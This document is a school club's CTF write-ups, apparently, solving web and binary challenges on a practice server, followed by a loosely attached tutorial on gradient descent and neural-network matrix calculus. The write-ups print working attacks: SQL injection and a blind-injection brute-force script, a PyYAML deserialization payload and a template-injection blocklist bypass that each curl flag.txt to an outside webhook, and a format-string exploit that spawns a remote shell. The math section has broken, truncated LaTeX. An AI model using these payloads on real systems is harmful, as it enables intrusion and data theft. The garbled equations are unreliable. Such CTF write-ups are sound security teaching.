AppVenture Login page must be the most secure right? URL: http://35.240.143.82:4208/

Hint:

What's the first thing you do when pentesting a website?

One of the common files that websites contain is the `robots.txt`

, which decides what scrapers like google-bot can see and should see.

In this case the robots contains a path to the source code of the website, and the flag is inside the source code.

```
User-agent: *
Disallow: /c7179ef35b2d458d6f2f68044816e145/main.py
```

```
...
flag0 = "flag{you_can_use_automated_tools_like_nikto_to_do_this}"
...
```

Flag obtained

]]>Well, I haven't taken CS6131 yet but databases should be easy right??

From the description we can see the keyword databases, based on prior knowledge of the module CS6131, we can be pretty sure this is related to SQL.

Since the source operates on a simple template string SQL command, we can apply simple SQL injection and skip the password check.

```
@app.route("/login", methods=["post"])
def login():
username = request.form.get('username', default='', type=str)
password = request.form.get('password', default='', type=str)
users = db.execute(f"select id from users where name='{username}' and password='{password}'").fetchall()
if users:
return Response(flag1, mimetype='text/plain')
return Response('Login failed', mimetype='text/plain')
```

In SQL, comments can be made with `--`

To skip the password check, we can simply input `admin' --`

in username and leave password blank, which would result in the following command

```
select id from users where name='admin' --' and password=''
```

Everything behind `--`

is ignored and we successfully log in as admin

```
flag{you_can_pass_cs6131_now}
```

Flag obtained

]]>Ok, you got the flag, but I bet you'll never get my password!

Basing off the description, the flag is probably the password. Even though we logged in as admin in the last challenge, we do not know of the password.

To get the password, we can check the password 1 character at a time to reduce the number of tries. Trying the entire password string at a time require exponential amount of tries and will be unrealistic.

The flag format is `flag{...}`

where characters consist of lower case letters, `{}`

and `_`

. We can quickly code up a little script to find the password. In this writeup we will be using `node.js`

for the simplicity and non-pythonic syntax.

```
const fetch = require("node-fetch");
const FormData = require('form-data');
let chars = "abcdefghijklmnopqrstuvwxyz_{}".split('');
let password = [];
async function verify(i, c) {
const form = new FormData();
form.append('username', `admin' and SUBSTRING(password, ${i + 1}, 1)='${c}' --`);
const res = await fetch('http://35.240.143.82:4208/login', {method: 'POST', body: form})
const text = await res.text();
return text !== "Login failed"
}
async function step(i) {
for (let c of chars) {
if (await verify(i, c)) return c;
}
return null;
}
async function brute_force() {
let i = 0;
while (true) {
password[i] = await step(i);
console.log(password.join(''));
if (!password[i]) break;
i++;
}
console.log(password.join(''));
}
brute_force();
```

As before we use `admin'`

to escape the admin field, and `--`

to skip the password check.

However we add our own check in the middle, `SUBSTRING(password, i, 1)`

works the same as normal substring would but sql is 1-indexed(kinda weird but yeh)

What would happen would be like this

`select id from users where name='admin' and SUBSTRING(password, 1, 1)='a' --`

fail`select id from users where name='admin' and SUBSTRING(password, 1, 1)='b' --`

fail- ...
`select id from users where name='admin' and SUBSTRING(password, 1, 1)='f' --`

success`select id from users where name='admin' and SUBSTRING(password, 2, 1)='a' --`

fail- ...

`verify`

will make a request to check if the password has character in variable `c`

at position `i`

.

`step`

will simply try all characters for a position until one hits.

`brute_force()`

will step through all positions until a correct character can't be found for the position, which would be most likely the end of the password

```
f
fl
fla
...
flag{oops_looks_like_youre_not_blind
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
```

Flag obtained

]]>You've used espace2, but what about espace0?

Flag in

`flag.txt`

As before the source, `main.py`

was given

```
from flask import Flask, request, render_template, Response
import yaml
app = Flask(__name__)
assert yaml.__version__ == "5.3.1"
@app.route("/")
def index():
return render_template("./index.html")
@app.route("/", methods=["POST"])
def welcome():
student_data = request.form.get("student_data")
if not student_data:
return Response("Please specify some data in YAML format", mimetype='text/plain')
student_data = yaml.load(student_data)
required_fields = ["id","name","class"]
if type(student_data) != dict or "student" not in student_data or any(x not in student_data["student"] for x in required_fields):
return Response("Malformed data. Please try again.", mimetype='text/plain')
student = student_data["student"]
return f"<h1>Welcome, {student['name']} ({student['id']})</h1> <br>Your class is <b>{student['class']}</b>"
```

There are no obvious vulnerabilities to this file.

But the `assert yaml.__version__ == "5.3.1"`

part is quite suspicious.

A quick google search with keywords `pyyaml 5.3.1 vulnerabilities`

leads us to `https://security.snyk.io/vuln/SNYK-PYTHON-PYYAML-590151`

, a 9.8 scored RCE.

Conveniently a `uiuctf`

writeup was included that explained how the exploit worked. https://hackmd.io/@harrier/uiuctf20

Apparently it was a zero day vulnerability used in a CTF, what a chad move. We can simply take their payload and use it here as google is allowed in CTFs.

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ 'PAYLOAD_HERE' ]]]`

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ '__import__("os").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")' ]]]`

And after checking webhook.site for the received curl request

```
flag{yet_another_mal-coded_library}
```

Flag obtained

]]>My wonderful app works both as an echo server and a file lister!

Bet you can't hack it! `nc 35.240.143.82 4203`

Only the compiled `chal`

file was given, after decompiling it with Ghidra, I get

```
undefined8 main(void)
{
int32_t iVar1;
char *format;
setup();
while( true ) {
fgets(&format, 0x70, _stdin);
iVar1 = strncmp(&format, "quit", 4);
if (iVar1 == 0) break;
printf(&format);
}
system("/bin/ls");
return 0;
}
```

As I can see, and `printf`

has been used to print the output directly.

This challenge is in the format string attack category, which I can verify with a simple `%x`

```
$ nc 35.240.143.82 4203
%x
402004
%s
quit
```

I can use pwntools to quickly create our format string payload

I first have to find the offset which can be easily done with

```
from pwn import *
conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')
def send_payload(p):
conn.wait(1)
conn.sendline(p)
return conn.recv()
print("offset =", FmtStr(execute_fmt=send_payload).offset)
```

```
[x] Opening connection to 35.240.143.82 on port 4203
[x] Opening connection to 35.240.143.82 on port 4203: Trying 35.240.143.82
[+] Opening connection to 35.240.143.82 on port 4203: Done
[*] Found format string offset: 6
offset = 6
[*] Closed connection to 35.240.143.82 port 4203
```

In the decompiler, I noticed how `/bin/ls/`

is located at `0x00404058`

If I edit `/bin/ls/`

into `/bin/sh`

, as they have same amount of characters, I can gain remote shell access.

Hence I will be using `fmtstr_payload`

from pwntools

```
from pwn import *
conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')
payload = fmtstr_payload(0x6, {0x404058: b'/bin/sh'}, write_size='short')
conn.wait(1)
print("sending" + str(payload))
conn.sendline(payload)
print(conn.recv())
conn.sendline("quit")
conn.interactive()
```

We will be writing the string `/bin/sh`

to address `0x404058`

with offset `6`

.

After sending the payload, `/bin/ls`

will be changed to `/bin/sh`

. This means that after I exit the loop with `quit`

, it should give us shell access.

I will then switch to interactive to more easily take advantage of the shell.

```
system("/bin/sh");
```

Indeed we gain remote shell access.

By running the command `ls`

, I find `flag.txt`

, and with `cat flag.txt`

```
cat flag.txt
flag{why_would_printf_be_able_to_write_memory????!!}
```

Flag obtained

]]>If you run the following you can find the message I left

`cd ~ cd w cat README.txt Hello, I was here ;) ZY`

I've added a bunch of filters, so my app must be really secure now.

Flag in `flag.txt`

URL: http://35.240.143.82:4209/

The source, `main.py`

is included hence we should take a look.

```
import secrets
from flask import Flask, render_template_string, request
app = Flask(__name__)
@app.route("/")
def index():
name = request.args.get("name", default="World")
# Evil hacker cannot get past now!
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
for bad in blocklist:
name = name.replace(bad, "")
return render_template_string(f"<h1> Hello, {name}")
```

Since the server uses `render_template_string`

it's vulnerable to `{{}}`

template string attacks.

If we use `{{ 'Hello'+' '+'World' }}`

for name, it would give us `Hello World`

as the string inside is ran as code.

However as we can see, there is an blocklist, and it includes `{{`

and `}}`

.

To bypass this filter we can simply insert blocklisted words inside of blocklisted words. For example

`{flag{}flag}`

will not trigger when checking for `{{`

and `}}`

, but will have `flag`

removed when checking for flag, and would result in `{{}}`

as the end output.

Making use of this, we can construct our payloads with the help of a little script.

I had troubles with reading the file so I decided to just send the file content via curl

webhook.site is a easy to use site for sending data back

```
bypass = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read"]
bypass.reverse()
payload = ''
for toby in bypass:
payload = payload.replace(toby, toby[0] + "read" + toby[1:])
print(payload)
name = payload
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
for bad in blocklist:
name = name.replace(bad, "")
print(f"<h1> Hello, {name}")
```

If one simply use `__import__`

, one will soon realise that it does not exist, this could have been done by deleting built-ins from the python run time.

We can restore the built-ins via `reload(__builtins__)`

, however it is obviously, also deleted.

We need to find `__import__`

somehow.

With some experimenting, we can find that

```
>>> ().__class__.__bases__
(<type 'object'>,)
```

The tuple inherits directly from `object`

, hence we can find the list of types (extends object) by sending the payload

`{{().__class__.__bases__[0].__subclasses__()}}`

```
Hello, [<class 'type'>, <class 'async_generator'>, <class 'int'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>, <class 'bytes'>... <class 'flask.blueprints.BlueprintSetupState'>]
```

Much of the output is useless, `_frozen_importlib_external.FileLoader`

looks a bit suspicious though. (it is at position 118)

`{{().__class__.__bases__[0].__subclasses__()[118]}}`

```
Hello, <class '_frozen_importlib_external.FileLoader'>
```

Just verifying that the class is the `FileLoader`

, now lets see what builtins this FileLoader has

`{{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"]}}`

```
Hello, {'__name__': 'builtins' ... '__import__': <built-in function __import__>, ...help, or help(object) for help about object.}
```

**Hooray!** We found `__import__`

, now we just have to combine the payload into

```
{{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flflag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

`flag.txt`

is manually bypassed since it contains `flag`

```
{read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}
<h1> Hello, {{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

The first line is our payload, and after running the same blocklist operations as the server, the resulting string looks ok.

`http://35.240.143.82:4209/?name={read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}`

And after checking webhook.site

```
flag{server_side_rendering_is_fun_but_dangerous_sometimes}
```

Flag obtained

]]>**Mathematics** is an area of knowledge, which includes the study of such topics as numbers, formulas and related structures, shapes and spaces in which they are contained, and quantities and their changes. There is no general consensus about its exact scope or epistemological status. However, it is extremely labourious and time-consuming but necessary and is sometimes (albeit very rarely) interesting.

Neural Networks are somewhat interesting. Everyone kind of knows the math behind NNs (the gist of it). It was taught in **CS5131** to a very limited extent but not many know about the full math behind deep and convolutional neural networks. I mean people get that it has something to do with backpropogation or whatever, but how do you scale it up to multiple value and multiple derivatives. As you will come to learn, these derivations are incredibly computationally intensive and time-consuming, especially during implementation. But I have done it because I care about AppVenture and I want to help the casual onlooker understand the many trials and tribulations a simple layer goes through to deliver what we should consider peak perfection. It was a fun but painful exercise and I gained a deeper understanding of the mathematical constructs that embody our world. Anyways, let's start out with a referesher. Warning that Matrix Math lurks ahead, so tread with caution. This is deeper than **CS5131** could have ever hoped to cover, so you will learn some stuff with this excercise. This first part is about the math behind deep neural networks.

This article is written with some assumed knowledge of the reader but it is not that bad for most CS students especially since NNs are baby level for the most part. Nonetheless, assumed knowledge is written below.

- Deep Neural Network (How to implement + basic understanding of the math)
- Gradient Descent
- Linear Algebra

If you don't know this stuff, all you really need to do is read an introduction to linear algebra, understand how matrices and vectors are multiplied and watch 3b1b's series on machine learning.

Let's start by importing our bff for life, **Numpy**.

```
>>> import numpy as np
```

Numpy is introduced in CS4132 (or PC6432 for some reason), but for a quick summary, it is a Linear Algebra library, which means it is VERY useful in this task.

Observe the following series of mathematical equations:

$$ \begin{aligned} 4a+2b&=22\ 3a+8b&=49 \end{aligned} $$

Despite the fact that solving these is pretty easy (as we learnt in Year 1), let's try going with a different solution from what is usually portrayed. Let's try using **gradient descent**.

If you remember, Gradient Descent is a method used to solve any sort of equation by taking steps towards the real value by using calculus to predict the direction and size of the step. Essentially if you remember in calculus, the minimum of the graph will have a tangent of slope 0 and hence we can understand the direction of these "steps" to solve the problem. We just need a function where the derivative and function result approach 0 as you get closer to the true solution. This function is known as the objective function.

As you probably know, a linear equation is written as such:

$$ A \mathbf{x}-\mathbf{b}=0 $$

where $A$ is a known square matrix, $\mathbf{b}$ is a known vector and $\mathbf{x}$ is an unknown vector.

In this case, for the objective function we will use Linear Least Squares (LLS) function as it is an accurate thing to minimize in this case written below.

$$F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}_{2}^{2}$$

Now, what do the weird lines and two occurences of "2" above mean and how exactly do we calculate the derivative of a scalar in terms of a vector? Well we have to learn matrix calculus, a very peculiar domain of math that is very torturous. Ideally, you want to avoid this at all cost, but I will do a gentle walk through this stuff.

Firstly, let's revise derivatives wth this simple example:

$$ \begin{aligned} y&=sin(x^2)+5\ \frac{dy}{dx}&=\frac{d}{dx}\left(sin(x^2)+5\right)\ &=2xcos(x^2) \end{aligned} $$

For functions with multiple variables, we can find the partial derivative with respect to each of the variables, as shown below: $$ \begin{aligned} f(x,y)&=3xy+x^2\ \frac{\partial f(x,y)}{\partial x}&=3y+2x\ \frac{\partial f(x,y)}{\partial y}&=3x \end{aligned} $$

A thing to understand is that vectors are just a collection of numbers, so an n-sized vector will have n partial derivatives if the function is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ (the derivative is known as the gradient). But do we represent these n partial derivatives as a column vector or row vector?

$$\frac{\partial y}{\partial\mathbf{x}} =
\begin{bmatrix}
\frac{\partial y}{\partial{\mathbf{x}}*{1}}\
\frac{\partial y}{\partial{\mathbf{x}}*{2}}\
\vdots\
\frac{\partial y}{\partial{\mathbf{x}}_{n}}\
\end{bmatrix}
$$

$$
\frac{\partial y}{\partial\mathbf{x}} =
\begin{bmatrix}
\frac{\partial y}{\partial{\mathbf{x}}*{1}} & \frac{\partial y}{\partial{\mathbf{x}}*{2}} & \cdots & \frac{\partial y}{\partial{\mathbf{x}}_{n}}
\end{bmatrix}
$$

Well, both actually can work (even if you think of a vector as a column vector), the first version is called the denominator layout and the second one is called the numerator layout. They are both transpositions of each other. For gradient descent the denominator layout is more natural because for standard practice because we think of a vector as a column vector. I also prefer the denominator layout. However, the numerator layout follows the rules of single variable calculus more normally and will be much easier to follow. For example, matrices do not have commutative multiplication so the direction you chain terms matters. We naturally think of chaining terms to the back and this is true for numerator layout but in denominator layout terms are chained to the front. Product rule also is more funny when it comes to denom layout. So moving forward we will stick with the numerator layout and transpose the matrix or vector once the derivative is found. We will also stick to column vectors.

First lets look at the $A\mathbf{x}-\mathbf{b}$ term and we will see why the derivative is so and so with a simple $2 \times 2$ case. $A\mathbf{x}-\mathbf{b}$ is a $f:\mathbb{R}^{n} \rightarrow \mathbb{R}^{n}$ and hence the derivative will be a matrix (known as the Jacobian to many). Lets first, see the general equation and work it out for every value.

\begin{bmatrix}
{\mathbf{b}}*{1} \
{\mathbf{b}}*{2}
\end{bmatrix} \
&=
\begin{bmatrix}
{a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1} \
{a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2}
\end{bmatrix}
\end{aligned}
$$

Now we calculate the Jacobian (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
\frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{1}} & \frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{2}}\
\frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{1}} & \frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{2}}\
\end{bmatrix} \
\frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{1}} &= {a}*{11}\
\frac{\partial {\mathbf{y}}*{1}}{\partial{\mathbf{x}}*{2}} &= {a}*{12}\
\frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{1}} &= {a}*{21}\
\frac{\partial {\mathbf{y}}*{2}}{\partial{\mathbf{x}}*{2}} &= {a}*{22}\
\frac{\partial \mathbf{y}}{\partial \mathbf{x}} &=
\begin{bmatrix}
{a}*{11} & {a}*{12}\
{a}*{21} & {a}*{22}\
\end{bmatrix}
= A
\end{aligned}
$$

We see that it is kind of the same with single variable, where if we have $f(x)=ax$, then $f'(x)=a$ where a is constant.

Now we look at the lines and "2"s. This is a common function known as the euclidean norm or 2-norm.

$$|{\mathbf {x}}|*{2}:={\sqrt {x*{1}^{2}+\cdots +x_{n}^{2}}}$$

We then square it giving rise to the second "2". Now we define and do the same thing we did with $Ax-b$, $|{\mathbf {y}}|_{2}^{2}$ is $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$. Hence, the derivative is a row vector.

$$
\begin{aligned}
z&=|{\mathbf {y}}|*{2}^{2}\
&={\mathbf {y}}*{1}^{2} + {\mathbf {y}}_{2}^{2}
\end{aligned}
$$

Now we calculate the Gradient (remember that it is transposed) by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{y}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{2}}
\end{bmatrix} \
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{1}} &= 2\mathbf{y}*{1} \
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{y}}*{2}} &= 2\mathbf{y}*{2} \
\frac{\partial F(\mathbf{x})}{\partial\mathbf{y}} &=
\begin{bmatrix}
2\mathbf{y}*{1} & 2\mathbf{y}*{2}
\end{bmatrix}
= 2\mathbf{y}^{T}
\end{aligned}
$$

To illustrate the chain rule, I will calculate it individually and put it all together.

$$
\begin{aligned}
F(\mathbf{x}) &= {||A\mathbf{x}-\mathbf{b}||}*{2}^{2} \
&= {({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1})}^{2} +
{({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}_{2})}^{2} \
\end{aligned}
$$

Now we calculate the Final Gradient by calculating the individual derivative for every value.

$$
\begin{aligned}
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{1}} & \frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{2}}
\end{bmatrix}\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{1}} &= 2{a}*{11}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{21}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2})\
\frac{\partial F(\mathbf{x})}{\partial{\mathbf{x}}*{2}} &= 2{a}*{12}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{22}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2})\
\frac{\partial F(\mathbf{x})}{\partial\mathbf{x}} &=
\begin{bmatrix}
2{a}*{11}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{21}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2}) & 2{a}*{12}({a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1}) + 2{a}*{22}({a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2})
\end{bmatrix}\
&= 2
\begin{bmatrix}
{a}*{11}{\mathbf{x}}*{1} + {a}*{12}{\mathbf{x}}*{2}-{\mathbf{b}}*{1} &
{a}*{21}{\mathbf{x}}*{1} + {a}*{22}{\mathbf{x}}*{2}-{\mathbf{b}}*{2}
\end{bmatrix}
\begin{bmatrix}
{a}*{11} & {a}*{12} \
{a}*{21} & {a}*{22} \
\end{bmatrix} = 2{(A\mathbf{x}-\mathbf{b})}^{T}A
\end{aligned}
$$

As we can see from that last step, its pretty complex an expression, but you can see how neat matrix notation is as compared to writing all that out and you see how matrix calculus works. With numerator layout, its very similar to single-variable but with a few extra steps.

I then transpose the derivative back into the denominator layout written below. The step function is also written below which we will use for the gradient descent.

$$
\begin{aligned}
F(\mathbf{x}) &= {||A\mathbf{x}-\mathbf{b}||}^{2} \
\nabla F(\mathbf {x} ) &= 2 A^{T}(A\mathbf {x} -\mathbf{b}) \
\mathbf{x}*{n+1} &= \mathbf{x}*{n}-\gamma \nabla F(\mathbf {x} _{n})
\end{aligned}
$$

where $\gamma$ is the learning rate, we need a small learning rate as it prevents the function from taking large steps and objective functions tend to overblow the "true" error of a function.

We can now implement this in code form for a very simple linear system written below:

$$ \begin{aligned} w+3x+2y-z=9\ 5w+2x+y-2z=4\ x+2y+4z=24\ w+x-y-3z=-12 \end{aligned} $$

This can be written as such in matrix form:

\begin{bmatrix} 9\ 4\ 24\ -12 \end{bmatrix} $$

$$ A= \begin{bmatrix} 1 & 3 & 2 & -1\ 5 & 2 & 1 & -2\ 0 & 1 & 2 & 4\ 1 & 1 & -1 & -3 \end{bmatrix} $$

```
>>> A = np.array([[1,3,2,-1],[5,2,1,-2],[0,1,2,4],[1,1,-1,-3]], dtype=np.float64)
>>> A
array([[ 1., 3., 2., -1.],
[ 5., 2., 1., -2.],
[ 0., 1., 2., 4.],
[ 1., 1., -1., -3.]])
```

$$ \mathbf{b}= \begin{bmatrix} 9\ 4\ 24\ -12 \end{bmatrix} $$

```
>>> b = np.array([[9],[4],[24],[-12]], dtype=np.float64)
>>> b
array([[ 9.],
[ 4.],
[ 24.],
[-12.]])
```

$$ \mathbf{x}= \begin{bmatrix} w\ x\ y\ z \end{bmatrix} $$

```
>>> x = np.random.rand(4,1)
>>> x
array([[0.09257854],
[0.16847643],
[0.39120624],
[0.78484474]])
```

$$ F(\mathbf{x}) = {||A\mathbf{x}-\mathbf{b}||}^{2} $$

```
>>> def objective_function(x):
return np.linalg.norm(np.matmul(A,x) - b) ** 2
```

$$ \nabla F(\mathbf {x} )=2A^{T}(A\mathbf {x} -\mathbf {b}) $$

```
>>> def objective_function_derivative(x):
return 2 * np.matmul(A.T, np.matmul(A,x) - b)
```

In this case, I implemented an arbritary learning rate and arbritary step count. In traditional non-machine learning gradient descent, the learning rate changes per step and is determined via a heuristic such as the Barzilaiâ€“Borwein method, however this is not necessary as gradient descent is very robust. I used an arbritary step count for simplicity but you should ideally use some sort of boolean condition to break the loop such as $F(\mathbf{x})<0.01$.

$$
\mathbf {x}*{n+1}=\mathbf {x}*{n}-\gamma \nabla F(\mathbf {x} _{n})
$$

```
>>> learning_rate = 0.01
>>> for i in range(5000):
x -= learning_rate * objective_function_derivative(x)
>>> x
array([[1.],
[2.],
[3.],
[4.]])
```

And to check, we now use a simple matrix multiplication:

```
>>> np.matmul(A,x)
array([[ 9.],
[ 4.],
[ 24.],
[-12.]])
```

Voila, we have solved the equation with gradient descent, and the solution is super close. This shows the power of gradient descent.

To understand the math behind a deep neural network layer, we will first look at the single perceptron case.

$$ z=xw+b\ a=\sigma (z) $$

where $w$ is the weight, $b$ is the bias, $x$ is the input, $\sigma$ is the activation function and $a$ is the output.

We assume that this is a single layer network and that the loss function is just applied after, and we will just use the MSE loss.

$$c = {(a-y)}^2$$

where $y$ is the true y, $c$ is the cost.

In this case, it is quite easy to represent. Let us expand it to a layer with 4 input neurons and 4 output neurons.

$$
\begin{aligned}
{w}*{11}{x}*{1} + {w}*{21}{x}*{2} + {w}*{31}{x}*{3} + {w}*{41}{x}*{4} + {b}*{1} = &{z}*{1}\
{w}*{12}{x}*{1} + {w}*{22}{x}*{2} + {w}*{32}{x}*{3} + {w}*{42}{x}*{4} + {b}*{2} = &{z}*{2}\
{w}*{13}{x}*{1} + {w}*{23}{x}*{2} + {w}*{33}{x}*{3} + {w}*{43}{x}*{4} + {b}*{3} = &{z}*{3}\
{w}*{14}{x}*{1} + {w}*{24}{x}*{2} + {w}*{34}{x}*{3} + {w}*{44}{x}*{4} + {b}*{4} = &{z}*{4}\
{a}*{1}=\sigma(&{z}*{1})\
{a}*{2}=\sigma(&{z}*{2})\
{a}*{3}=\sigma(&{z}*{3})\
{a}*{4}=\sigma(&{z}*{4})\
c = \frac{1}{4} \left((a_1-y_1)^2 + (a_2 - y_2)^2 + (a_3 - y_3)^2 + (a_4 - y_4)^2\right)
\end{aligned}
$$

As you can see, this is just a linear system much like the one showed in the example and it becomes very simple.

$$ \begin{aligned} \mathbf{z} &= W\mathbf{x} + \mathbf{b}\ \mathbf{a} &= \sigma(\mathbf{z}) \ c &= \frac{1}{n} ||\mathbf{a} - \mathbf{y}||^2_2 \end{aligned} $$

From our work earlier we know that:

$$ \begin{aligned} \frac{\partial \mathbf{z}}{\partial \mathbf{b}}&=I \ \frac{\partial \mathbf{z}}{\partial \mathbf{x}}&= W \ \frac{\partial c}{\partial \mathbf{a}} &= \frac{2}{n} \left(\mathbf{a} - \mathbf{y} \right)^\text{T} \end{aligned} $$

However we have once again hit a speedbump. How do we find the derivative of a vector $\mathbf{z}$ with respect to a matrix $W$? The function is of the form $f:\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m}$. Hence, the derivative will be a third order tensor also known as a 3D matrix. (colloquially) But for now we will use a trick to dodge the usage of third order tensors because of the nature of the function $W\mathbf{x}$. For this example, I use $m=3$ and $n=2$ but its generalizable for any sizes.

$$
\begin{aligned}
\mathbf{z} = W\mathbf{x} + \mathbf{b}\
\begin{bmatrix}
{\mathbf{z}}*{1} \
{\mathbf{z}}*{2} \
{\mathbf{z}}*{3}
\end{bmatrix} &= \begin{bmatrix}
{w}*{11} & {w}*{12}\
{w}*{21} & {w}*{22}\
{w}*{31} & {w}*{32}\
\end{bmatrix}
\begin{bmatrix}
{\mathbf{x}}*{1} \
{\mathbf{x}}*{2}
\end{bmatrix}
+
\begin{bmatrix}
{\mathbf{b}}*{1} \
{\mathbf{b}}*{2} \
{\mathbf{b}}*{3}
\end{bmatrix} \
&=
\begin{bmatrix}
{w}*{11}{\mathbf{x}}*{1} + {w}*{12}{\mathbf{x}}*{2} + {\mathbf{b}}*{1}\
{w}*{21}{\mathbf{x}}*{1} + {w}*{22}{\mathbf{x}}*{2} + {\mathbf{b}}*{2}\
{w}*{31}{\mathbf{x}}*{1} + {w}*{32}{\mathbf{x}}*{2} + {\mathbf{b}}_{3}\
\end{bmatrix}
\end{aligned}
$$

We now calculate the individual derivatives of $\mathbf{z}$ wrt to $W$.

$$
\begin{aligned}
\frac{\partial \mathbf{z}*{1}}{\partial w*{11}}=\mathbf{x}*{1}\quad
\frac{\partial \mathbf{z}*{2}}{\partial w_{11}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{11}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{12}}=\mathbf{x}*{2}\quad
\frac{\partial \mathbf{z}*{2}}{\partial w_{12}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{12}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{21}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{21}}=\mathbf{x}*{1}\quad
\frac{\partial \mathbf{z}*{3}}{\partial w_{21}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{22}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{22}}=\mathbf{x}*{2}\quad
\frac{\partial \mathbf{z}*{3}}{\partial w_{22}}=0\
\frac{\partial \mathbf{z}*{1}}{\partial w*{31}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{31}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{31}}=\mathbf{x}*{1}\
\frac{\partial \mathbf{z}*{1}}{\partial w_{32}}=0\quad
\frac{\partial \mathbf{z}*{2}}{\partial w*{32}}=0\quad
\frac{\partial \mathbf{z}*{3}}{\partial w*{32}}=\mathbf{x}_{2}\
\end{aligned}
$$

We see that this is a pretty complex looking tensor but we see that a majority of the values are 0 allowing us to pull of an epic hack by considering the fact that at the end we are essentially trying to get a singular scalar value (the loss) and find the partial derivative of that wrt to $W$. There are some steps involved in getting from $\mathbf{z}$ to $c$ but for simplicity instead of showing everything, we will condense all of this into a function $f:\mathbb{R}^{n} \rightarrow \mathbb{R}$ which is defined as $c=f(\mathbf{z})$. In this case, we know the tensor values and we know the gradient and what the derivative should be. Hence, we now just evaluate it and see if we can see any property:

\mathbf{x}\frac{\partial c}{\partial\mathbf{z}} \end{aligned} $$

